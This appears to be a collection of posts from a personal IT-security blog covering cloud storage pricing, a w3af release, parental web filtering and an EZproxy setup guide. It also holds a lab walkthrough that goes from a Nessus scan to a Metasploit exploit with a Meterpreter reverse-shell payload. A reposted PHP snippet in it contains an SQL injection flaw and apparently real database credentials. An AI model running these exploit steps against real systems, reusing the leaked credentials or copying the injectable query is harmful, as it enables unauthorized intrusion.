Battle of the cloud storage providers

With the recent show and tell of Google’s GDrive cloud storage solution its now painfully obvious that other cloud storage providers in that arena is scrambling for fear of lost of business.  As we all know Google has a track record of coming out with solutions to rivals the competitors and usually end up being the victor. This market is getting very popular over the last few years and statically it has been proven that users that started off as a free users will eventually become paying customers so the key is to get as much free users as possible.

For the last year or so the words “free cloud storage” was almost synonymous with “Dropbox”, even on the mobile platform their application was widely accepted now with Google finally in the arena its going to be interesting to see how others will start to change their business model. I have recently received some form of communication form the following providers of (Skydrive, Box, Dropbox, Ubuntu One) and wanted to give a brief summary of them and see how the might stack-up  to GDrive.

Lets start with GDrive, they are offering a 5 GB free for new users,  has a mobile application (Android devices), GDocsDrive desktop client, allows all of the average features (upload, share, collaborate),  and as of now it appears they have a 10GB file size upload limitation. The other interesting thing about this is the fact that to upgrade to 25 GB a month it will only cost you $2.50, or 100GB for just $4.99/mo. The one reason that I believe the might capture a large piece of market share is simply based on their name and the fact that they have a solid infrastructure and should be able to handle larger traffic than the average provider in this sphere.

Next is Dropboxwhich is a free service that lets you bring all your photos, docs, and videos anywhere. This means that any file you save to your Dropbox will automatically save to all your computers, phones and even the Dropbox website. The start off with 2GB free and additional 500 MB per referral, now the paid model starts with 50 GB for $10/mo, and has a file size upload limit of 2GB however if you upload files via the website you have a 300 MB cap.

Skydrive, who has been trying to gain popularity for a while and at one point offered you 25GB free storage recently restructured and is only offering 7GB free for all new users, you had the option to keep your  25GB if you were a old users but you had to log in and claim it before April 22 which has already passed. If you require more space and you love Skydrive you can get 20GB/$10yr or 100GB for $50/yr. As of now Skydrive offer the most free space and the most value for your money per space annually.

Box is another competitor who tried recently to gain new users by offering mobile users 50GB free for life if the signed up from their mobile device. If you don’t use this option you can always get 25GB for $10/mo or 50GB for $20/mo. They have a few downfalls, the have  a 200MB file upload cap, and of course the only offer a desktop client solution business/enterprise users only.

Last on my list is Ubuntu One who currently offer your standard 5GB for free users and you can get an additional 20GB for $3/mo or $30/yr. The good thing about this is you are getting a good value for your money however I don’t think the do a good job marking this product and as such I believe the might fade into the background amidst all the other big names out there.

For a great overview of some of the services mentioned above you can take a glance at this  comparison image I found over at PCWorld

What services are you using?


w3af 1.0-stable released!




w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend.  This project is currently hosted at SourceForge , for further information, you may also want to visit w3af SourceForge project page . You can also watch a few video demos over at  w3af video demos!

I have used this application before on the BackTrack Linux pentesting distro, but at the time it was still being improved and it was really buggy; so I am really happy to see that a new release is out and I cant wait to start testing.

In this latest release, we bring you a couple of the most
important improvements of our framework:

* Stable code base, an improvement that will reduce your w3af
crashes to a minimum. We’ve been working on fixing all of our
long-standing bugs, wrote thousands of lines of doctests and various
types of automation to make sure we can also keep improving without
breaking other sections of the code.

* Auto-Update, which will allow you to keep your w3af
installation updated without any effort. Always get the latest and
greatest from our contributors!

* Web Application Payloads, for people that enjoy exploitation
techniques, this is one of the most interesting things you’ll see in
web application security! We created various layers of abstraction
around an exploited vulnerability in order to be able to write
payloads that use emulated syscalls to read, write and execute files
on the compromised web server. Keep an eye on the rapid7 community
blog an entry completely dedicated to this subject!

* PHP static code analyzer, as part of a couple of experiments
and research projects, Javier Andalia created a PHP static code
analyzer that performs tainted mode analysis of PHP code in order to
identify SQL injections, OS Commanding and Remote File Includes. At
this time you can use this very interesting feature as a web
application payload. After exploiting a vulnerability try: “payload
php_sca”, that will download the remote PHP code to your box and
analyze it to find more vulnerabilities!

And many others, such as:

* Refactoring of HTTP cache and GTK user interface code to
store HTTP requests only once on disk (5% performance improvement)
* Performance improvement in sqlite database by using indexes
(1% performance improvement)
* Huge w3af code-base refactoring on how URLs are handled.
Moved away from handling URLs as strings into a url_object model. This
reduces the number of times a URL is parsed into its component pieces
(protocol, domain, path, query string, etc.) and put back together
into a string, which clarifies the code and makes it run faster.

We have a stable release, w0000t! Hmmmm…. have we finished? Should
we go home? No! We still have work to do; there are still features and
capabilities we’d like to add. For example,as you read this, we’re
working on integrating the multiprocessing module into w3af’s code,
with the objective of using more than one CPU core at the same time
and substantially improve our scanning speed. We’re also working on
handling of encodings by the use of unicode strings across the whole
framework, and making the user experience more intuitive in the UI.

As usual, you can get the latest installable packages from the [0] website! Just download and enjoy our latest improvements!


To go a step further checkout the documentation and other resources on the tool:

Official documentation:

  • The w3af user’s guide can be found here .
  • A French translation of the users guide made by Jerome Athias can be found here .
  • The epydoc documentation for w3af can be found here .
  • The presentation materials used at the T2 conference can be found here .

External resources:

  • Josh Summit wrote a two part tutorial of w3af on his blog: 1 , 2 .
  • Fuzion wrote a windows installation tutorial on his blog .

From Nessus to Metasploit to game over

How many times have you fired off a Nessus scan and then after finding the goodies you have to go to either ExploitDB , or a similar site in search for a exploit. Or if you are a pro then its off to go and write your own exploit for the newly discovered vulnerability.

Today’s post will focus on what to do after you have scanned that vulnerable system and found a juice vulnerability. If this is the first time you have heard of ExploitDB or Metasploit you should first visit the Metasploit Unleashed training site.

Lab setup

  • Backtrack 4 Linux VM
  • Windows 2003 server with a  vulnerable web app

Below are the necessary steps to get from a Nessus scan to the correct Metasploit module for  exploiting your system.

Step one: Install Nessus

You can download your copy of nessus from HERE and don’t forget to register for a homefeed license. Now create your scan policy or used from one of the default policies. I selected the web application policy since the target server was running and outdated web application.  Once your scan is completed download the report and save it in a .nessus format.

Step two: Launching  Metasploit

Login to your machine of choice, in my case its my BackTrack4 Linux VM. Issue the following commands to load Metasploit:

  • cd /pentest/exploits/framework3 (change directory to your metasploit installation dir)
  • ./msfconsole
  • svn up (to get the latest update)

Step three: DB Magic

At this stage you will need to create a DB, import the scanned nessus report, and then perform your hacking kungfu with the db_autopwn command.

msf > db_create

msf > db_connect
[-] Note that sqlite is not supported due to numerous issues.
[-] It may work, but don’t count on it
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db

db_import /pentest/results/nessus_report_TestSrvr.nessus
msf > db_import /pentest/results/nessus_report_Appsrvr.nessus
[*] Importing ‘Nessus XML (v2)’ data
[*] Importing host
[*] Successfully imported /pentest/results/nessus_report_TestSrvr.nessus

db_autopwn -t -x

This command will search Metasploit for any exploits that matches your various vulnerability from the Nessus report, it will not automatically run the exploit for our unless you use the -e option. In most cases if you are testing this against a live system then you should leave out the -e option to avoid crashing your server.

msf > db_autopwn -t -x
[*] Analysis completed in 10 seconds (0 vulns / 0 refs)
[*] ================================================================================
[*]                             Matching Exploit Modules
[*] ================================================================================
[*]  exploit/windows/smb/psexec  (CVE-1999-0504, OSVDB-3106)
[*]  exploit/windows/http/apache_mod_rewrite_ldap  (CVE-2006-3747, BID-19204, OSVDB-27588)
[*] ================================================================================

From this point I have two exploits to choose from:

msf > use exploit/windows/http/apache_mod_rewrite_ldap
msf exploit(apache_mod_rewrite_ldap) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(apache_mod_rewrite_ldap) > set LHOST
msf exploit(apache_mod_rewrite_ldap) > set RHOST
msf exploit(apache_mod_rewrite_ldap) > exploit

From this point on its GAME OVER!



Protecting the innocent from the Internet part 1

Being a father of four with my oldest already at the age where he needs to use the computer I started asking myself do I have the ideal setup? And the answer was not really. Don’t get me wrong I have a PF sense firewall and a few other protections in place however I wanted to build a solution from the ground up instead of just installing a bunch of  packages on my firewall and not really understanding whats going on in the back end.

My proposed solution is to have a system that caches and scans web traffic for viruses as well as preform some sort of content filtering  based on various detection methods (phrase matching, PICS filtering and URL filtering etc) and most importantly the solution must be **FREE** to implement. I am sure the are other solutions in place that does a better job than the one I have outlined and by all means feel free to comment or email me.

Tools I plan on using:

  • FreeBSD 8.1
  • ClamAV
  • Squid
  • Dansguardian
  • Privoxy
  • HAVP

FreeBSD: If you are going to choose an OS I would suggest BSD, because in my opinion its one of the most secure and well build system out there.

ClamAV: Is an open source (GPL) anti-virus toolkit for UNIX, designed especially for e-mail scanning on mail gateways. It provides a number of utilities including a flexible and scalable multi-threaded daemon, a command line scanner and advanced tool for automatic database updates.

Squid: Squid is a caching proxy for the Web supporting HTTP, HTTPS, FTP, and more. It reduces bandwidth and improves response times by caching and reusing frequently-requested web pages.

Dansguardian: Is an award winning Open Source web content filter which currently runs on Linux, FreeBSD, OpenBSD, NetBSD, Mac OS X, HP-UX, and Solaris. It filters the actual content of pages based on many methods including phrase matching, PICS filtering and URL filtering. It does not purely filter based on a banned list of sites like lesser totally commercial filters.

Privoxy: Is a non-caching web proxy with advanced filtering capabilities for enhancing privacy, modifying web page data and HTTP headers, controlling access, and removing ads and other obnoxious Internet junk. Privoxy has a flexible configuration and can be customized to suit individual needs and tastes.

HAVP (HTTP AntiVirus proxy): is a proxy with an anti-virus filter. It does not cache or filter content.

Setup Phase

The first thing you need to do before you start installing your apps is to make sure you set a static address up on your BSD box, in my case I have freeBSD 8.1:

vi /etc/rc.conf and add the following lines, my gateway was and IP

ifconfig_le0=” netmask″

I would also run freebsd-update fetch and  freebsd-update install since it never hurts to have an updated repo. Now this is as far as I will go with this post, in my next post I will go through the install, config and testing. Comments and suggestions are always welcome.

–Sherwyn AKA Infolookup


Month of Abysssec Undisclosed Bugs

the below Post came through Full Disclosure mailing this today and I figured for something this interesting it merited a re-post.

Month of Abysssec Undisclosed Bugs – Day 1 From: muts
Date: Wed, 01 Sep 2010 15:21:34 +0200

Hi Lists,

The Abysssec Security Team has started its Month of Abysssec undisclosed
bugs (MOAUB).

During this month, Abysssec will release a collection of 0days, web application vulnerabilities, and detailed binary analysis (and pocs) for recently released advisories by vendors such as Microsoft, Mozilla, Sun, Apple, Adobe, HP, Novel, etc.

The exploits, papers and PoCs will be featured on the Exploit-Database (, averaging one 0day and one binary analysis a day.

Get your hard-hats on, your VM¹s and debugging tools organized ­ it’s going to be a an intensive ride.

Posted today – MOAUB Day 1:


2 —

Abysssec and the Exploit Database Team

Since these are going to be mostly 0-days or currently unpatched vulnerabilities, it might be time to update to the latest versions of your various applications. Lastly if you have not been looking at your various logs, and consoles this week might be a good time to start.

Being smart about testing your application

This is just going to be a short writeup on something I figure was worth mentioning. While going through pastebin I found the following entry  3 seconds after it was posted–> :


include ‘top.php’;

include ‘submenuhonorshall.php’;



$db = ‘gnemi_addison’;

mysql_connect(“”, “gnemi_root”, “ignurupi87”) or die(mysql_error());

mysql_select_db($db) or die(mysql_error());


<div id=”content”>

<h1>Honors Hall Library</h1>

<form method=”post”>

<p class=”norm”>

<select name=”searchby”>

<option value=”Author_First_Name”>Author First Name</option>

<option value=”Author_Last_Name” selected=”selected”>Author Last Name</option>

<option value=”Title”>Title</option>


<input type=”text” name=”query” />

<input type=”submit” value=”Submit!” />




$result = mysql_query(“SELECT * FROM `library` WHERE `'” . $_POST[‘searchby’] . “‘` = ‘” . $_POST[‘query’] . “‘ ORDER BY `Title` LIMIT 20”);

while ($row = mysql_fetch_array($result))


echo $row[‘Last Name’] . $row[‘First Name’] . $row[‘Title’] .$row[‘inout’];




include ‘../address.php’;

include ‘../phptemplates/bottomhall.php’;


Now to the average person that’s not a big deal, but to me after looking at that bit of php code the following questions came to mind:

  • Would I find anything useful if I were to Google the various pages referenced in that code or maybe the domain “”?
  • What if I ran a whois lookup against that domain what would I find?
  • What if I Google the email addresses associated with that domain?
  • And most importantly are the username and password referenced stilling being used currently?
  • Are those tables and DB name real or just test names?
  • Would I find anything interesting if I were to crawl that website?

Now a simple whois returned a valid email address along with some other useful information:

And just out of curiosity after visiting I was presented with the following:

Now I ***DID NOT LOGIN*** I repeat  ***DID NOT LOGIN*** so I don’t know if those credential are valid BUT what if the were? I am hoping for this person’s sake all of the above information is just for testing purposes but what if its no? Sanitizing all valid  information before posting it would have been nice.

Ezproxy Deployment Guide

I was recently working on a Ezproxy deployment project, and after having to jump between several pages on the website I decided to put together this guide for anyone that has to do an Ezproxy deployment and wanted to find everything in one place.

What is EZproxy?

EZproxy helps provide users with remote access to Webbased  licensed content offered by libraries. It is middleware  that authenticates library users against local authentication  systems and provides remote access to licensed content based on the user’s authorization.

Ezproxy Setup

md ezproxy
cd ezproxy

  • Download ezproxy-win32.exe into this directory.
  • Rename ezproxy-win32.exe to ezproxy.exe with the command: rename ezproxy-win32.exe ezproxy.exe
Install as a Service
  • Open a “Command Prompt”
  • Cd ezproxy
  • Issue the command Exproxy –si
  • Net start ezproxy

Configure Hostname and Admin login

  • Use a text editor to edit the file user.txt. To this file, add a line similar to this with your admin username and password: someuser:somepass:admin
  • Start the server with the command “ezproxy” or net start ezproxy

Configuring Proxy by hostname

  • Add the following two options to your DNS forwardlookup zone
    • A record and
    • *
    • Edit your config.txt and add the following line
      • Option ProxyByHostname

Configure LDAP Authentication

  • Login to your ezproxy admin portal
  • Click on the “Test LDAP” link under the Miscellaneous section of the page
  • Fill out the following fields and this will build your config file for you:
    • Bind User: Specifies the distinguished name (DN) to use when binding to the directory to search for the user. Ex I used Sysinternals “Active Directory Explorer” to connect to our DC and browsed for my user in question and just looked at the properties for the bind user value. “CN=Ezproxy,OU=Test Accounts,OU=Network Testing,DC=testdomain,DC=edu”
    • Password: Password for your LDAP username Test123
    • LDAP Version: I used V3
    • Use SSL: Yes
    • Host[:port]: Enter your domain controller FQDNex
    • Search Base: After entering your FQDN for your DC click on “Find search base” towards the bottom to see a list of available search bases, just click on the first one ex DC=testdomain,DC=edu
    • Disable referral chasing: Yes
    • Search Attribute: sAMAccountName
    • Test User: Regular AD user ex john.smith
    • Test Password: John Smith’s password
    • Lastly copy the config that is outputted below the page and add it to your user.txt file

Configure SSL secure login

  • Edit config.txt and add the line LoginPortSSL 443
  • Login to
  • Click on manage SSL certificates, then click on create new SSL cert
  • Fill out the info, and select self-sign or purchase a cert from VeriSign
  • Type ACTIVE in the box, then click activate to make the cert active
  • To force HTTPS login enter the following line
    • Option ForceHTTPSLogin

Configure Additional Security

  • Edit the cofig.txt file and add the following entries

Audit Most
AuditPurge 7
Option StatusUser
Option LogSession
IntruderIPAttempts -interval=5 -expires=15 20
IntruderUserAttempts -interval=5 -expires=15 10
UsageLimit -enforce -interval=15 -expires=120 -MB=100 Global

Note if you make any changes to the config.txt or user.txt files you must issue a net stop ezproxy && net start ezproxy, or just use services.msc to stop and start the service.